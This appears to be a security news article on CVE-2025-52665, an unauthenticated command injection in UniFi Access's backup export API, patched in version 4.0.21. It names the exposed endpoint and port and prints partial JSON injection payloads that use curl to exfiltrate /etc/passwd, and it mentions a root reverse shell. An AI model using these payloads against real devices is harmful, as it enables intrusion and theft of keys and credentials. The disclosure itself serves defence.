Researchers at Catchify Security uncovered a severe unauthenticated remote code execution (RCE) vulnerability in UniFi OS, specifically affecting the UniFi Access application.
Dubbed CVE-2025-52665, the flaw stems from a misconfigured API endpoint in the backup system, allowing attackers to execute arbitrary commands without credentials.
This discovery, part of a larger pattern of insecure unauthenticated APIs lacking input validation, earned the team a $25,000 bounty from Ubiquiti.
The issue highlights how overlooked design flaws in networked devices can lead to full system compromise.
From Recon To Code Dive: Uncovering The Weak Link
The hunt began with standard network reconnaissance on a target UniFi Dream Machine SE router at 192.168.1.1, revealing the familiar login interface.
Community forums provided crucial clues, rife with reports of 500 errors and connection refusals tied to the /api/ucore/backup/export endpoint.
Users frequently encountered failures during backups across modules like Protect, Network, and Access, suggesting a modular system relying on internal loopback APIs.
Delving deeper, the team unpacked UniFi Core releases and scrutinized service.js.
No sanitization occurs, enabling command injection as the endpoint interpolates “dir” into shell commands like mktemp, chmod, and tar.
Intended for localhost-only access, this internal handler’s exposure via an external proxy created a dangerous bridge.
Crafting The Exploit: Injection To Interactive Access
Port scanning exposed the vulnerability on TCP port 9780, where a POST to /api/ucore/backup/export returned a 405 error confirming the route’s existence.
Mimicking the orchestrator’s JSON body, researchers tested payloads.
An initial attempt with {“dir”:”/tmp/catchify-lab; curl -s –data-binary @/etc/passwd failed due to trailing shell syntax conflicts from the backup pipeline.
Refining to {“dir”:”/tmp/catchify-; curl -s –data-binary @/etc/passwd succeeded, terminating the injection cleanly while commenting out residuals.
This exfiltrated /etc/passwd and enabled a reverse shell, granting interactive root access. In UniFi Access contexts, it compromised door controls and NFC credentials.
Broader Risks And Fixes
Further probing revealed unauthenticated endpoints like /api/v1/user_assets/nfc for creating assets and /api/v1/user_assets/touch_pass/keys leaking PEM private keys and NFC data verified against Ubiquiti’s API docs.
Ubiquiti patched this in UniFi Access 4.0.21; users should upgrade immediately. Reported on October 9, 2025, the fix underscores the need for rigorous API controls in IoT ecosystems.
 vulnerability){kind=link}